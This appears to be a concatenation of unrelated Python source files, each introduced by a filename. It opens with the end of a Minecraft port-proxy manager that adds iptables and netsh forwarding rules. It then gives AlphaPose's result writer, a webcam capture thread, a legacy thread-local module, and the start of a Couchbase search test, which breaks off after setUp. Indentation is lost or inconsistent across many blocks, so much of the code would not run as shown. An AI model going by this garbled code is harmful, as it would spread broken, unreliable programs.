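# other OS the registered stub raises when called.
def _example_platform_specific():
    @platform_specific('Linux')
    def say_hello():
        return 'hello from Linux'

    @platform_specific('Windows')
    def say_hello():
        return 'hello from Windows'

    # Whichever variant matches the detected platform ends up in the registry.
    return platform_specific_lib['say_hello']()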
def bind_platform_funcs():
'''Bind decorated platform specific functions to current module'''
current_module = __import__(__name__)
for name in platform_specific_lib.keys():
setattr(current_module, name, platform_specific_lib[name])
def check_platform_support():
''' Checks if current OS capable of running this script
Returns:
bool: True if capable
'''
log.debug('Checking for platform support')
    log.debug('Detected platform: %s' % PLATFORM)
    if PLATFORM not in ['Linux', 'Windows']:
        log.error('Unsupported platform: %s' % platform.platform())
return False
    if PLATFORM == 'Windows':
win_ver = platform.win32_ver()[0]
log.debug('Detected Windows version: %s' % win_ver)
# netsh with portproxy available on Windows 7 and above
if win_ver not in ['7', '8', '8.1', '10']:
log.error('Unsupported Windows version: %s' % platform.platform())
return False
# netsh needs elevated shell
import ctypes
is_admin = ctypes.windll.shell32.IsUserAnAdmin()
log.debug('Running elevated' if is_admin else 'Running not elevated')
if is_admin == 0:
log.error('netsh requires elevation')
log.error('Run script as administrator')
return False
    if PLATFORM == 'Linux':
        # check that the necessary binaries are available
        if not binary_exists('iptables'):
            log.error('iptables not found')
            return False
        log.debug('iptables present')
        if not binary_exists('iptables-save'):
            log.error('iptables-save not found')
            return False
        log.debug('iptables-save present')
        if not binary_exists('netstat'):
            log.error('netstat not found')
            return False
        log.debug('netstat present')
        # check iptables output to determine whether the current user actually has rights to change firewall settings
_, nat_err = shell('iptables -t nat -L')
if nat_err is None: # kali linux iptables stuck on non-root user for some reason
log.error('iptables not responding')
log.error('Probably need to restart as root')
return False
# WSL 1 response with such error
if b'Table does not exist' in nat_err:
log.error('Kernel does not support forwarding')
return False
# Obvious insufficient permissions
if b'Permission denied' in nat_err:
log.error('Insufficient permissions to modify iptables rules')
log.error('Restart script as root')
return False
log.debug('iptables output accepted')
        # check iptables-save output to determine whether the current user actually has rights to dump firewall settings
nat_out, nat_err = shell('iptables-save')
        if nat_err is None or nat_out == b'': # WSL 1 gives an empty response here :/
log.error('iptables-save not responding')
log.error('Probably need to restart as root')
return False
# Obvious insufficient permissions
if b'Permission denied' in nat_err:
log.error('Insufficient permissions to dump iptables rules')
log.error('Restart script as root')
return False
log.debug('iptables-save output accepted')
        # check netstat output to determine whether the current user has rights to run netstat and identify PIDs
netstat_out, _ = shell('netstat -lntp')
if netstat_out is None or netstat_out == b'':
log.error('netstat not responding')
log.error('Probably need to restart as root')
return False
try:
lines = [l for l in netstat_out.decode('utf-8').splitlines() if 'LISTEN' in l]
except UnicodeDecodeError:
log.error('Cannot decode netstat output')
log.error('NETSTAT OUTPUT:')
log.error(netstat_out)
return False
if len(lines) == 0:
log.warning('No listening sockets detected via netstat. Can not determine if netstat works properly.')
log.info('Opening listening socket to recheck netstat')
import socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind((socket.gethostname(), 8789))
netstat_out, _ = shell('netstat -lntp')
serversocket.close()
if netstat_out is None or netstat_out == b'':
log.error('netstat not responding')
log.error('Probably need to restart as root')
return False
try:
lines = [l for l in netstat_out.decode('utf-8').splitlines() if 'LISTEN' in l]
except UnicodeDecodeError:
log.error('Cannot decode netstat output')
log.error('NETSTAT OUTPUT:')
log.error(netstat_out)
return False
if len(lines) == 0:
log.error('No listening sockets detected via netstat')
log.error('Probably need to restart as root')
return False
for line in lines:
line = [l for l in line.split(' ') if l]
if line[-1] == '-':
log.error('Insufficient permissions to identify pids with netstat')
log.error('Restart script as root')
return False
log.debug('netstat output accepted')
# check if ip forwarding enabled
cat_out, cat_err = shell('cat /proc/sys/net/ipv4/ip_forward')
if cat_err is None: # WTF
log.error('cat not responding')
return False
if b'Permission denied' in cat_err:
log.error('Insufficient permissions to check /proc/sys/net/ipv4/ip_forward')
return False
if b'1' not in cat_out:
log.error('IP forwarding disabled. Enable it with `echo "1" > /proc/sys/net/ipv4/ip_forward`')
return False
log.debug('ip forwarding enabled')
log.debug('Current platform is supported')
return True
#######################
## PLATFORM SPECIFIC ##
#######################
@platform_specific('Linux')
def get_rule(from_port, to_port):
''' Get rule tuple from firewall rules dump
Parameters:
from_port (int): port which traffic will be forwarded
to_port (int): port traffic will be forwarded to
Returns:
(int, int, str, Any): rule tuple (from_port, to_port, source addr, rules)
'''
cmd = 'iptables-save'
log.debug('Executing `%s`' % cmd)
out, err = shell(cmd)
if err is None:
log.error('iptables-save not responding')
return None
elif len(err) > 2:
log.error('IPTABLES-SAVE ERROR:')
log.error(err)
if out is not None and len(out) < 3:
log.error('bad response from iptables-save')
log.error('IPTABLES-SAVE OUTPUT:')
log.error(out)
return None
    # extract the NAT table (from the *nat line till the COMMIT line)
    try:
        dump = out.decode('utf-8')
        nat_table = dump[dump.index('*nat'):]
        rule_lines = nat_table[:nat_table.index('COMMIT')].splitlines()
except UnicodeDecodeError:
log.error('Cannot decode iptables-save output')
log.error('IPTABLES-SAVE OUTPUT:')
log.error(out)
return None
except ValueError:
log.error('Cannot find NAT table in iptables-save output')
log.error('IPTABLES-SAVE OUTPUT:')
log.error(out)
return None
# resulting variables (iport, oport, oaddr, rules)
iport, oport, oaddr, rules = None, None, '127.0.0.1', []
# filter NAT table
for line in rule_lines:
if ('--dport %d' % from_port) in line and ('--to-ports %d' % to_port) in line and '-s 127.0.0.1' in line:
rules.append(line)
# return found rules
log.debug('Get rule for [%d, %d]: %s' % (from_port, to_port, str(rules)))
if len(rules) > 1:
iport = int(re.search(r'--dport (\d+)', rules[0]).group(1))
oport = int(re.search(r'--to-ports (\d+)', rules[0]).group(1))
return (iport, oport, oaddr, rules)
return None
@platform_specific('Windows')
def get_rule(from_port, to_port):
''' Get rule tuple from firewall rules dump
Parameters:
from_port (int): port which traffic will be forwarded
to_port (int): port traffic will be forwarded to
Returns:
(int, int, str, Any): rule tuple (from_port, to_port, source addr, rules)
'''
cmd = 'netsh interface portproxy dump'
log.debug('Executing `%s`' % cmd)
out, err = shell(cmd)
if err is None:
log.error('netsh not responding')
return None
elif len(err) > 2:
log.error('NETSH ERROR:')
log.error(err)
if out is not None and len(out) < 3:
log.error('bad response from netsh')
log.error('NETSH OUTPUT:')
log.error(out)
return None
# extract portproxy rules (from reset line till popd line)
try:
dump = out.decode('utf-8')
rule_lines = dump[dump.index('reset'):dump.index('popd')].splitlines()
except UnicodeDecodeError:
log.error('Cannot decode netsh output')
log.error('NETSH OUTPUT:')
log.error(out)
return None
except ValueError:
log.error('Cannot find rules in portproxy dump')
log.error('NETSH OUTPUT:')
log.error(out)
return None
# find rule
for line in rule_lines:
        if ('listenport=%d' % from_port) in line and ('connectport=%d' % to_port) in line:
log.debug('Get rule for [%d, %d]: "%s"' % (from_port, to_port, line))
iport = int(re.search(r'listenport=(\d+)', line).group(1))
oport = int(re.search(r'connectport=(\d+)', line).group(1))
oaddr = re.search(r'connectaddress=([0-9.]+)', line).group(1)
return (iport, oport, oaddr, line)
return None
@platform_specific('Linux')
def add_rule(from_port, to_port):
''' Add port forwarding rule
Parameters:
from_port (int): port which traffic will be forwarded
to_port (int): port traffic will be forwarded to
'''
cmd = 'iptables -t nat -A PREROUTING -s 127.0.0.1 -p tcp --dport %d -j REDIRECT --to %d'
log.debug('Executing `%s`' % cmd)
out, err = shell(cmd % (from_port, to_port))
if err is None:
log.error('iptables not responding')
return
elif len(err) > 2:
log.error('IPTABLES ERROR:')
log.error(err)
if out is not None and len(out) > 2:
log.warning('IPTABLES OUTPUT:')
        log.warning(out)
cmd = 'iptables -t nat -A OUTPUT -s 127.0.0.1 -p tcp --dport %d -j REDIRECT --to %d'
log.debug('Executing `%s`' % cmd)
out, err = shell(cmd % (from_port, to_port))
if err is None:
log.error('iptables not responding')
return
elif len(err) > 2:
log.error('IPTABLES ERROR:')
log.error(err)
if out is not None and len(out) > 2:
log.warning('IPTABLES OUTPUT:')
        log.warning(out)
@platform_specific('Windows')
def add_rule(from_port, to_port):
''' Add port forwarding rule
Parameters:
from_port (int): port which traffic will be forwarded
to_port (int): port traffic will be forwarded to
'''
cmd = 'netsh interface portproxy add v4tov4 listenport=%d listenaddress=0.0.0.0 connectport=%d connectaddress=127.0.0.1'
log.debug('Executing `%s`' % cmd)
out, err = shell(cmd % (from_port, to_port))
if err is None:
log.error('netsh not responding')
return
elif len(err) > 2:
log.error('NETSH ERROR:')
log.error(err)
if out is not None and len(out) > 4:
log.warning('NETSH OUTPUT:')
        log.warning(out)
@platform_specific('Linux')
def drop_rule(rule):
''' Drop port forwarding rule
Parameters:
        rule (tuple): rule which will be dropped from the NAT table
'''
cmd = 'iptables -t nat -D PREROUTING -s 127.0.0.1 -p tcp --dport %d -j REDIRECT --to %d'
log.debug('Executing `%s`' % cmd)
out, err = shell(cmd % (rule[0], rule[1]))
if err is None:
log.error('iptables not responding')
return
elif len(err) > 2:
log.error('IPTABLES ERROR:')
log.error(err)
if out is not None and len(out) > 2:
log.warning('IPTABLES OUTPUT:')
        log.warning(out)
cmd = 'iptables -t nat -D OUTPUT -s 127.0.0.1 -p tcp --dport %d -j REDIRECT --to %d'
out, err = shell(cmd % (rule[0], rule[1]))
if err is None:
log.error('iptables not responding')
return
elif len(err) > 2:
log.error('IPTABLES ERROR:')
log.error(err)
if out is not None and len(out) > 2:
log.warning('IPTABLES OUTPUT:')
        log.warning(out)
@platform_specific('Windows')
def drop_rule(rule):
''' Drop port forwarding rule
Parameters:
        rule (tuple): rule which will be dropped from the portproxy table
'''
cmd = 'netsh interface portproxy delete v4tov4 listenport=%d listenaddress=0.0.0.0'
log.debug('Executing `%s`' % cmd)
out, err = shell(cmd % (rule[0]))
if err is None:
log.error('netsh not responding')
return
elif len(err) > 2:
log.error('NETSH ERROR:')
log.error(err)
if out is not None and len(out) > 4:
log.warning('NETSH OUTPUT:')
        log.warning(out)
@platform_specific('Linux')
def get_listening_ports(pid):
''' Get listening ports of specified process
Parameters:
pid (int): process PID
Returns:
list: list of listening ports
'''
cmd = 'netstat -nltp'
out, err = shell(cmd)
if err is None:
log.error('netstat not responding')
return
elif len(err) > 2:
log.error('NETSTAT ERROR:')
log.error(err)
if out is not None and len(out) < 3:
log.error('bad response from netstat')
log.error('NETSTAT OUTPUT:')
log.error(out)
return None
ports = set()
try:
lines = out.decode('utf-8').splitlines()
except UnicodeDecodeError:
log.error('Cannot decode netstat output')
log.error('NETSTAT OUTPUT:')
log.error(out)
return None
    # parse netstat output
for line in lines:
if 'tcp' not in line or 'LISTEN' not in line:
continue
# parse netstat line as table row
row = [x for x in line.split(' ') if x]
if row[-1].split('/')[0] == str(pid): # last column is PID/ProcessName
ports.add(int(row[3].split(':')[-1])) # fourth column is addr:port
return list(ports)
@platform_specific('Windows')
def get_listening_ports(pid):
''' Get listening ports of specified process
Parameters:
pid (int): process PID
Returns:
list: list of listening ports
'''
cmd = 'netstat.exe -ano'
out, err = shell(cmd, timeout=2)
if err is None:
log.error('netstat not responding')
return
elif len(err) > 2:
log.error('NETSTAT ERROR:')
log.error(err)
if out is not None and len(out) < 3:
log.error('bad response from netstat')
log.error('NETSTAT OUTPUT:')
log.error(out)
return None
ports = set()
try:
lines = out.decode('utf-8').splitlines()
except UnicodeDecodeError:
log.error('Cannot decode netstat output')
log.error('NETSTAT OUTPUT:')
log.error(out)
return None
    # parse netstat output
for line in lines:
if 'TCP' not in line or 'LISTENING' not in line:
continue
# parse netstat line as table row
row = [x for x in line.split(' ') if x]
if row[-1] == str(pid): # last column is PID
ports.add(int(row[1].split(':')[-1])) # second column is addr:port
return list(ports)
def get_game_processes():
''' Get running game instances (includes netcat instances if INCLUDE_NETCAT flag enabled)
Returns:
list: list of PIDs of running game instances
'''
games = []
for proc in psutil.process_iter():
try:
pinfo = proc.as_dict(attrs=['pid', 'name'])
            # assume Minecraft is run by a java process with the word 'minecraft' in its args
if 'java' in pinfo['name']:
for arg in proc.cmdline():
if 'minecraft' in arg.lower():
games.append(pinfo)
break
if INCLUDE_NETCAT and ('nc.exe' == pinfo['name'] or 'nc' == pinfo['name']):
games.append(pinfo)
except (OSError, psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
pass
return games
#############################
## MINE PORT PROXY MANAGER ##
#############################
class MinePortProxy(object):
''' Port Proxy Manager
Workflow loop:
* filter_old_instances
* load_new_instances
* sleep timeout
Expects close method call to drop all added firewall rules
'''
def __init__(self, port_start=25565, port_end=None):
''' MinePortProxy Constructor
Parameters:
port_start (int): port pool minimum value (default: 25565)
            port_end (int): port pool maximum value (default: port_start)
'''
super().__init__()
if port_end is None:
port_end = port_start
self.instances = []
self.pids = []
self.port_pool = set(range(port_start, port_end+1))
def filter_old_instances(self):
''' Drops rules for non-existent listening ports associated with game instances '''
live_instances = []
live_pids = []
for pid, rule in self.instances:
for _ in range(4):
ports = get_listening_ports(pid)
if ports is not None:
break
if ports is None:
log.warning('Can not get listening ports for PID %d' % pid)
log.warning('Keeping rule (%d -> %d) alive' % (rule[0], rule[1]))
live_instances.append((pid, rule))
live_pids.append(pid)
continue
if len(ports) == 0 or ports[0] != rule[1]: # assume that instance listens only one port
drop_rule(rule)
self.port_pool.add(rule[0])
log.info('Old instance (pid %d) dropped (rule %d -> %d)' % (pid, rule[0], rule[1]))
else:
#log.debug('Instance (pid %d) alive (rule %d -> %d)' % (pid, rule[0], rule[1]))
live_instances.append((pid, rule))
live_pids.append(pid)
self.instances = live_instances
self.pids = live_pids
def load_new_instances(self):
''' Create missing rules for listening ports associated with game instances '''
for game in get_game_processes():
pid = game['pid']
if pid in self.pids:
continue
ports = get_listening_ports(pid)
if ports is None:
log.warning('Can not get listening ports for PID %d' % pid)
continue
if len(ports) == 0:
continue
if len(self.port_pool) == 0:
log.info('Cannot load new instance (pid %d), not enough ports' % pid)
continue
from_port = self.port_pool.pop()
to_port = ports[0] # assume that instance listens only one port
add_rule(from_port, to_port)
rule = get_rule(from_port, to_port)
if rule is None:
log.error('Failed to add rule %d -> %d' % (from_port, to_port))
self.port_pool.add(from_port)
continue
self.instances.append((pid, rule))
self.pids.append(pid)
log.info('New instance (pid %d) added (rule %d -> %d)' % (pid, rule[0], rule[1]))
def close(self):
''' Drops all created rules '''
for _, rule in self.instances:
drop_rule(rule)
self.port_pool.add(rule[0])
self.instances = []
self.pids = []
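# A minimal sketch of the manual (non-threaded) workflow described in the class
# docstring above; the port range is just a placeholder. Rules are always
# dropped on the way out via close().
def _example_manual_proxy_loop():
    proxy = MinePortProxy(25565, 25570)
    try:
        while True:
            proxy.filter_old_instances()
            proxy.load_new_instances()
            time.sleep(1)
    except KeyboardInterrupt:
        pass
    finally:
        proxy.close()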
class MinePortProxyThreaded(MinePortProxy):
''' Threaded Manager extends Proxy Manager with threaded start/stop functionality '''
def __init__(self, *args):
''' MinePortProxyThreaded Constructor
Parameters:
port_start (int): port pool minimum value (default: 25565)
            port_end (int): port pool maximum value (default: port_start)
'''
super().__init__(*args)
self.thread = threading.Thread(target=self.__thread_loop, args=())
self.stop_event = threading.Event()
self.started = False
def __thread_loop(self):
while not self.stop_event.is_set():
self.filter_old_instances()
self.load_new_instances()
time.sleep(1)
self.close()
def start(self):
        ''' Starts the manager in a separate thread '''
if self.started == True:
raise Exception('MinePortProxyDaemon already started')
self.started = True
self.thread.start()
def stop(self):
''' Stops manager '''
if self.started == False:
raise Exception('MinePortProxyDaemon is not started')
self.stop_event.set()
self.thread.join()
self.started = False
self.stop_event.clear()
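# A small sketch of the threaded manager's start/stop contract (main() below
# uses the same pattern): start() spawns the worker loop, stop() sets the stop
# event, joins the thread, and drops all rules via close().
def _example_threaded_manager():
    manager = MinePortProxyThreaded(25565, 25570)
    manager.start()
    time.sleep(10)
    manager.stop()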
def set_log_level(lvl):
LOGGING_CONFIG['handlers']['default']['level'] = lvl
LOGGING_CONFIG['loggers']['mineportproxy']['level'] = lvl
def main(argv):
parser = argparse.ArgumentParser(description='Starts MinePortProxy manager')
parser.add_argument('-d', '--debug', action='store_true', help='enables debug output and INCLUDE_NETCAT flag')
parser.add_argument('-l', '--log-level', nargs=1, default=['INFO'], help='sets log level')
parser.add_argument('port_start', nargs='?', type=int, default=25565, help='port pool minimum value')
parser.add_argument('port_end', nargs='?', type=int, default=None, help='port pool maximum value')
args = parser.parse_args(argv[1:])
if args.log_level[0] not in ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']:
print('Bad log level argument')
parser.print_help()
return - 1
set_log_level(args.log_level[0])
if args.debug:
set_log_level('DEBUG')
global INCLUDE_NETCAT
INCLUDE_NETCAT = True
port_start = args.port_start
port_end = port_start
if args.port_end is not None:
port_end = args.port_end
if port_start > port_end or port_start < 1 or port_end > 65534:
print('Invalid port range')
parser.print_help()
return - 1
# ARGUMENT PARSING ENDS HERE
global log
logging.config.dictConfig(LOGGING_CONFIG)
log = logging.getLogger('mineportproxy')
if check_platform_support() is False:
log.critical('Unsupported platform')
return - 1
manager = MinePortProxyThreaded(port_start, port_end)
log.info('Starting MinePortProxy manager')
manager.start()
while True:
try:
inp = input()
if inp == 'quit' or inp == 'q':
break
except KeyboardInterrupt:
break
log.info('Stopping MinePortProxy manager')
manager.stop()
return 0
bind_platform_funcs()
if __name__ == '__main__':
res = main(sys.argv)
exit(res)
|
writer.py
|
import os
import time
from threading import Thread
from queue import Queue
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.transforms import get_func_heatmap_to_coord
from alphapose.utils.pPose_nms import pose_nms, write_json
DEFAULT_VIDEO_SAVE_OPT = {
'savepath': 'examples/res/1.mp4',
'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
'fps': 25,
'frameSize': (640, 480)
}
EVAL_JOINTS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
class DataWriter():
def __init__(self, cfg, opt, json_name, save_video=False,
video_save_opt=DEFAULT_VIDEO_SAVE_OPT,
queueSize=1024):
self.cfg = cfg
self.opt = opt
self.json_name = json_name
self.video_save_opt = video_save_opt
self.eval_joints = EVAL_JOINTS
self.save_video = save_video
self.heatmap_to_coord = get_func_heatmap_to_coord(cfg)
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.result_queue = Queue(maxsize=queueSize)
else:
self.result_queue = mp.Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
if opt.pose_flow:
from trackers.PoseFlow.poseflow_infer import PoseFlowWrapper
self.pose_flow_wrapper = PoseFlowWrapper(save_path=os.path.join(opt.outputpath, 'poseflow'))
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to read pose estimation results per frame
self.result_worker = self.start_worker(self.update)
return self
def update(self):
final_result = []
norm_type = self.cfg.LOSS.get('NORM_TYPE', None)
hm_size = self.cfg.DATA_PRESET.HEATMAP_SIZE
if self.save_video:
            # initialize the file video stream, adapt output video resolution to the original video
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
if not stream.isOpened():
print("Try to use other video encoders...")
ext = self.video_save_opt['savepath'].split('.')[-1]
fourcc, _ext = self.recognize_video_ext(ext)
self.video_save_opt['fourcc'] = fourcc
self.video_save_opt['savepath'] = self.video_save_opt['savepath'][:-4] + _ext
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
assert stream.isOpened(), 'Cannot open video for writing'
        # keep looping infinitely
while True:
# ensure the queue is not empty and get item
(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) = self.wait_and_get(self.result_queue)
if orig_img is None:
# if the thread indicator variable is set (img is None), stop the thread
if self.save_video:
stream.release()
write_json(final_result, self.opt.outputpath, self.json_name, form=self.opt.format, for_eval=self.opt.eval)
print("Results have been written to json.")
return
# image channel RGB->BGR
orig_img = np.array(orig_img, dtype=np.uint8)[:, :, ::-1]
if boxes is None or len(boxes) == 0:
if self.opt.save_img or self.save_video or self.opt.vis:
self.write_image(orig_img, im_name, stream=stream if self.save_video else None)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
assert hm_data.dim() == 4
#pred = hm_data.cpu().data.numpy()
if hm_data.size()[1] == 136:
self.eval_joints = [*range(0,136)]
elif hm_data.size()[1] == 26:
self.eval_joints = [*range(0,26)]
pose_coords = []
pose_scores = []
for i in range(hm_data.shape[0]):
bbox = cropped_boxes[i].tolist()
pose_coord, pose_score = self.heatmap_to_coord(hm_data[i][self.eval_joints], bbox, hm_shape=hm_size, norm_type=norm_type)
pose_coords.append(torch.from_numpy(pose_coord).unsqueeze(0))
pose_scores.append(torch.from_numpy(pose_score).unsqueeze(0))
preds_img = torch.cat(pose_coords)
preds_scores = torch.cat(pose_scores)
if not self.opt.pose_track:
boxes, scores, ids, preds_img, preds_scores, pick_ids = \
pose_nms(boxes, scores, ids, preds_img, preds_scores, self.opt.min_box_area)
_result = []
for k in range(len(scores)):
_result.append(
{
'keypoints':preds_img[k],
'kp_score':preds_scores[k],
'proposal_score': torch.mean(preds_scores[k]) + scores[k] + 1.25 * max(preds_scores[k]),
'idx':ids[k],
'box':[boxes[k][0], boxes[k][1], boxes[k][2]-boxes[k][0],boxes[k][3]-boxes[k][1]]
}
)
result = {
'imgname': im_name,
'result': _result
}
if self.opt.pose_flow:
poseflow_result = self.pose_flow_wrapper.step(orig_img, result)
for i in range(len(poseflow_result)):
result['result'][i]['idx'] = poseflow_result[i]['idx']
final_result.append(result)
if self.opt.save_img or self.save_video or self.opt.vis:
if hm_data.size()[1] == 49:
from alphapose.utils.vis import vis_frame_dense as vis_frame
elif self.opt.vis_fast:
from alphapose.utils.vis import vis_frame_fast as vis_frame
else:
from alphapose.utils.vis import vis_frame
img = vis_frame(orig_img, result, self.opt)
self.write_image(img, im_name, stream=stream if self.save_video else None)
def write_image(self, img, im_name, stream=None):
if self.opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if self.opt.save_img:
cv2.imwrite(os.path.join(self.opt.outputpath, 'vis', im_name), img)
if self.save_video:
stream.write(img)
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def save(self, boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name):
# save next frame in the queue
self.wait_and_put(self.result_queue, (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name))
def running(self):
# indicate that the thread is still running
return not self.result_queue.empty()
def count(self):
# indicate the remaining images
return self.result_queue.qsize()
def stop(self):
# indicate that the thread should be stopped
self.save(None, None, None, None, None, None, None)
self.result_worker.join()
def terminate(self):
# directly terminate
self.result_worker.terminate()
def clear_queues(self):
self.clear(self.result_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def results(self):
# return final result
print(self.final_result)
return self.final_result
def recognize_video_ext(self, ext=''):
if ext == 'mp4':
return cv2.VideoWriter_fourcc(*'mp4v'), '.' + ext
elif ext == 'avi':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
elif ext == 'mov':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
else:
print("Unknow video format {}, will use .mp4 instead of it".format(ext))
return cv2.VideoWriter_fourcc(*'mp4v'), '.mp4'
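# A minimal usage sketch (cfg and opt are hypothetical AlphaPose config/option
# objects expected by DataWriter): the writer runs in its own worker, frames are
# queued through save(), and stop() enqueues a sentinel frame (orig_img=None)
# that makes update() write the JSON results and exit.
def _example_writer_usage(cfg, opt):
    writer = DataWriter(cfg, opt, json_name='alphapose-results.json').start()
    # per processed frame:
    # writer.save(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name)
    writer.stop()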
|
Threads.py
|
from threading import Thread
from collections import deque
import time
import cv2

class MyThread(object):
    def __init__(self):
        self.frame = deque(maxlen=5)
        self.running = True

    def run(self):
        # Continuously grab frames from the default camera into a small buffer.
        self.cap = cv2.VideoCapture(0)
        while self.running:
            ret, lframe = self.cap.read()
            if ret:
                self.frame.append(lframe)
        self.cap.release()

    def get_frame(self):
        # Return the oldest buffered frame, or None if the buffer is empty.
        try:
            return self.frame.popleft()
        except IndexError:
            return None

if __name__ == '__main__':
    myThreadOb1 = MyThread()
    th = Thread(target=myThreadOb1.run)
    th.start()
    while True:
        image = myThreadOb1.get_frame()
        if image is not None:
            cv2.imshow('video', image)
            # quit the display loop on 'q'
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
        else:
            time.sleep(1)
    myThreadOb1.running = False
    th.join()
    cv2.destroyAllWindows()
    print('Main Terminating...')
|
_threading_local.py
|
"""Thread-local objects.
(Note that this module provides a Python version of the threading.local
class. Depending on the version of Python you're using, there may be a
faster one available. You should always import the `local` class from
`threading`.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = mydata.__dict__.items()
... items.sort()
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... initialized = False
... def __init__(self, **kw):
... if self.initialized:
... raise SystemError('__init__ called too many times')
... self.initialized = True
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red'), ('initialized', True)], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
__all__ = ["local"]
# We need to use objects from the threading module, but the threading
# module may also want to use our `local` class, if support for locals
# isn't compiled in to the `thread` module. This creates potential problems
# with circular imports. For that reason, we don't import `threading`
# until the bottom of this file (a hack sufficient to worm around the
# potential problems). Note that almost all platforms do have support for
# locals in the `thread` module, and there is no circular import problem
# then, so problems introduced by fiddling the order of imports here won't
# manifest on most boxes.
class _localbase(object):
__slots__ = '_local__key', '_local__args', '_local__lock'
def __new__(cls, *args, **kw):
self = object.__new__(cls)
key = '_local__key', 'thread.local.' + str(id(self))
object.__setattr__(self, '_local__key', key)
object.__setattr__(self, '_local__args', (args, kw))
object.__setattr__(self, '_local__lock', RLock())
        if (args or kw) and (cls.__init__ is object.__init__):
raise TypeError("Initialization arguments are not supported")
        # We need to create the thread dict in anticipation of
        # __init__ being called, to make sure we don't call it
        # again ourselves.
dict = object.__getattribute__(self, '__dict__')
currentThread().__dict__[key] = dict
return self
def _patch(self):
key = object.__getattribute__(self, '_local__key')
d = currentThread().__dict__.get(key)
if d is None:
d = {}
currentThread().__dict__[key] = d
object.__setattr__(self, '__dict__', d)
# we have a new instance dict, so call out __init__ if we have
# one
cls = type(self)
if cls.__init__ is not object.__init__:
args, kw = object.__getattribute__(self, '_local__args')
cls.__init__(self, *args, **kw)
else:
object.__setattr__(self, '__dict__', d)
class local(_localbase):
def __getattribute__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__getattribute__(self, name)
finally:
lock.release()
def __setattr__(self, name, value):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__setattr__(self, name, value)
finally:
lock.release()
def __delattr__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__delattr__(self, name)
finally:
lock.release()
def __del__(self):
import threading
key = object.__getattribute__(self, '_local__key')
try:
threads = list(threading.enumerate())
except:
# If enumerate fails, as it seems to do during
# shutdown, we'll skip cleanup under the assumption
# that there is nothing to clean up.
return
for thread in threads:
try:
__dict__ = thread.__dict__
except AttributeError:
# Thread is dying, rest in peace.
continue
if key in __dict__:
try:
del __dict__[key]
except KeyError:
pass # didn't have anything in this thread
from threading import currentThread, RLock
|
fts_free_tier_limits.py
|
# coding=utf-8
import json
import threading
from lib import global_vars
from lib.SystemEventLogLib.fts_service_events import SearchServiceEvents
from pytests.security.rbac_base import RbacBase
from .fts_base import FTSBaseTest
from .fts_base import NodeHelper
from lib.membase.api.rest_client import RestConnection
from deepdiff import DeepDiff
import time
class FtsFreeTierLimits(FTSBaseTest):
def setUp(self):
super(FtsFreeTierLimits, self).setUp()
self.rest = RestConnection(self._cb_cluster.get_master_node())
self.fts_rest = RestConnection(self._cb_cluster.get_random_fts_node())
